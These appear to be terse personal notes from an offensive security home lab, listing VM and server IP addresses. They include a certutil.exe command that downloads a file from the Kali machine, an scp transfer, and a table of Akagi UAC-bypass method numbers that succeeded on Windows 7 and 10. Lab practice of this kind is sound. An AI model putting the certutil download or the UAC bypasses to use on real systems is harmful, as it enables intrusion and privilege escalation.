VM 192.168.32.x/24

kali 			32
share\share 	2
8				80
8.1				81
10				101
10.2			102
7x64			76
7x32			73
splunk			112

Servers
172.16.0.x/24
Sven			2
Duy				3
Bulge			4
Benny			5
ESXi			24
Schmid			32
Kali			232
Splunk			112

certutil.exe -urlcache -split -f
"http://192.168.32.32/rick/yeet.txt"
scp (yeet.txt) root@172.16.0.232:root/Desktop/random

x64\Akagi 				22 -> 25	win10 x64		C:\Windows\System32\cmd.exe
precomiled x86\Akagi	1			win7 x86		-
""						3			win7 x86		-
""						24			win7 x86		C:\Windows\System32\cmd.exe
windir\Akagi			4-5			win7 x86		-